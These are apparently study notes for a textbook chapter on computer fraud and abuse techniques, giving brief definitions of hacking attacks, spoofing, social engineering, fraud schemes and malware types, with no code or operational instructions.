Chapter 5

Computer Fraud and Abuse Techniques

Computer Attacks and Abuse

Hacking

Unauthorized access, modification, or use of a computer system or other electronic device

Social Engineering

Techniques, usually psychological tricks, to gain access to sensitive data or information

Used to gain access to secure systems or locations

Malware

Any software which can be used to do harm

Types of Computer Attacks

Botnet—Robot Network. Hijacking is gaining control of a computer to carry out illicit activities without
the user’s knowledge.

 Network of hijacked computers

 Hijacked computers carry out processes without users knowledge.
 Zombie—hijacked computer

Denial-of-Service (DoS) Attack

Constant stream of requests made to a Web-server (usually via a Botnet) that overwhelms and shuts
down service

Spamming

is simultaneously sending the same unsolicited message to many people at the same time, often in
an attempt to sell something.

 Spammers also stage dictionary attacks (also called direct harvesting attacks). Spammers use
special software to guess e-mail addresses at a company and send blank e-mail messages.
Messages not returned usually have valid e-mail addresses and are added to spammer e-mail
lists.

Spoofing

Making an electronic communication look as if it comes from a trusted official source to lure the
recipient into providing information
Types of Spoofing

E-mail

E-mail sender appears as if it comes from a different source

Caller-ID

Incorrect number is displayed

IP address

Forged IP address to conceal identity of sender of data over the Internet or to impersonate another
computer system

Address Resolution Protocol (ARP)

Allows a computer on a LAN to intercept traffic meant for any other computer on the LAN

SMS

Incorrect number or name appears, similar to caller-ID but for text messaging

Web page

Phishing (see below)

DNS

Intercepting a request for a Web service and sending the request to a false service

Hacking Attacks

zero-day attack (or zero-hour attack) is an attack between the time a new software vulnerability is
discovered and the time a software developer releases a patch that fixes the problem.

Cross-Site Scripting (XSS)

Unwanted code is sent via dynamic Web pages disguised as user input.

Buffer Overflow

Data is sent that exceeds computer capacity causing program instructions to be lost and replaced with
attacker instructions.

SQL Injection (Insertion)

Malicious code is inserted in the place of query to a database system.

Man-in-the-Middle

Hacker places themselves between client and host.

Masquerading or impersonation is pretending to be an authorized user to access a system. This is
possible when the perpetrator knows the user’s ID number and password or uses her computer after
she has logged in (while the user is in a meeting or at lunch).

Piggybacking has several meanings:

1. The clandestine use of a neighbor’s Wi-Fi network; this can be prevented by enabling the security
features in the wireless network.

2. Tapping into a communications line and electronically latching onto a legitimate user before the user
enters a secure system; the legitimate user unknowingly carries the perpetrator into the system.

3. An unauthorized person following an authorized person through a secure door, bypassing physical
security controls such as keypads, ID cards, or biometric identification scanners.

Additional Hacking Attacks

Password Cracking

Penetrating system security to steal passwords

War Dialing

Computer automatically dials phone numbers looking for modems.

Phreaking

Attacks on phone systems to obtain free phone service.

Data Diddling

Making changes to data before, during, or after it is entered into a system.

Data Leakage

Unauthorized copying of company data.

Hacking Embezzlement Schemes

Podslurping is using a small device with storage capacity, such as an iPod or Flash drive, to download
unauthorized data.

Salami Technique

Taking small amounts from many different accounts.

Economic Espionage

Theft of information, trade secrets, and intellectual property.

Internet Terrorism

Act of disrupting electronic commerce and harming computers

Cyber-extortion is threatening to harm a company or a person if a specified amount of money is not
paid. Example releasing video or picture scandals.

Cyber-Bullying

 Internet, cell phones, or other communication technologies to support deliberate, repeated, and
hostile behavior that torments, threatens, harasses, humiliates, embarrasses, or otherwise
harms another person.

Sexting is exchanging sexually explicit text messages and revealing pictures, usually by means of a
phone. One particularly degrading form of cyber-bullying is posting or sharing these pictures and
messages with people who were never intended to see or read them.

Internet Terrorism

Act of disrupting electronic commerce and harming computers

Hacking for Fraud

Internet Misinformation (Fake News)

Using the Internet to spread false or misleading information

Internet Auction

Using an Internet auction site to defraud another person

 Unfairly drive up bidding

 Seller delivers inferior merchandise or fails to deliver at all
 Buyer fails to make payment

Internet Pump-and-Dump

Using the Internet to pump up the price of a stock and then selling it

 Click fraud is manipulating click numbers to inflate advertising bills.

 Web cramming is offering a free website for a month, developing a worthless website, and
charging the phone bill of the people who accept the offer for months, whether they want to
continue using the website or not.

Software piracy is the unauthorized copying or distribution of copyrighted software. Three frequent
forms of software piracy include:

(1) selling a computer with preloaded illegal software,

(2) installing a single-license copy on multiple machines, and

(3) loading software on a network server and allowing unrestricted access to it in violation of the
software license agreement.
Social Engineering Techniques

Identity Theft

Assuming someone else’s identity

Pretexting

Inventing a scenario that will lull someone into divulging sensitive information

Posing

Using a fake business to acquire sensitive information

Phishing

Posing as a legitimate company asking for verification type information: passwords, accounts,
usernames

Pharming

Redirecting Web site traffic to a spoofed Web site.

Carding refers to activities performed on stolen credit cards, including making a small online purchase
to determine whether the card is still valid and buying and selling stolen credit card numbers.

Typesquatting

Typographical errors when entering a Web site name cause an invalid site to be accessed

Tabnapping

Changing an already open browser tab

Scavenging

Looking for sensitive information in items thrown away

Shoulder Surfing

Snooping over someone’s shoulder for sensitive information

More Social Engineering

Lebanese Loping

Capturing ATM pin and card numbers

Skimming

Double-swiping a credit card

Chipping

Planting a device to read credit card information in a credit card reader

Eavesdropping

Listening to private communications

Type of Malware

Spyware

Secretly monitors and collects personal information about users and sends it to someone else

Adware

Pops banner ads on a monitor, collects information about the user’s Web-surfing, and spending habits,
and forward it to the adware creator

Scareware is software that is often malicious, is of little or no benefit, and is sold using scare tactics.
That is, it uses fear to motivate some sort of user action. The most common scare tactic is a dire warning
that a computer is infected with a virus, spyware, or some other catastrophic problem. Some scareware
even warns that a user’s job, career, or marriage is at risk.

Key logging

Records computer activity, such as a user’s keystrokes, e-mails sent and received, Web sites visited, and
chat session participation

Trojan Horse

Malicious computer instructions in an authorized and otherwise properly functioning program

Time bombs/logic bombs

Idle until triggered by a specified date or time, by a change in the system, by a message sent to the
system, or by an event that does not occur

More Malware

Trap Door/Back Door

A way into a system that bypasses normal authorization and authentication controls

Packet Sniffers

Capture data from information packets as they travel over networks

Steganography program - A program that can merge confidential information with a seemingly harmless
file, password protect the file, send it anywhere in the world, where the file is unlocked and the
confidential information is reassembled. The host file can still be heard or viewed because humans are
not sensitive enough to pick up the slight decrease in image or sound quality.

Rootkit

Used to hide the presence of trap doors, sniffers, and key loggers; conceal software that originates a
denial-of-service or an e-mail spam attack; and access user names and log-in information

Superzapping

Unauthorized use of special system programs to bypass regular system controls and perform illegal acts,
all without leaving an audit trail

computer worm is a self-replicating computer program similar to a virus, with some exceptions:

1. A virus is a segment of code hidden in or attached to a host program or executable file, whereas a
worm is a stand-alone program.

2. A virus requires a human to do something (run a program, open a file, etc.) to replicate itself, whereas
a worm does not and actively seek to send copies of itself to other network devices.

3. Worms harm networks (if only by consuming bandwidth),

Bluesnarfing - Stealing (snarfing) contact lists, images, and other data using flaws in bluetooth
applications. Before Bluetooth connections can be made \, the person contacted must agree to accept
the link.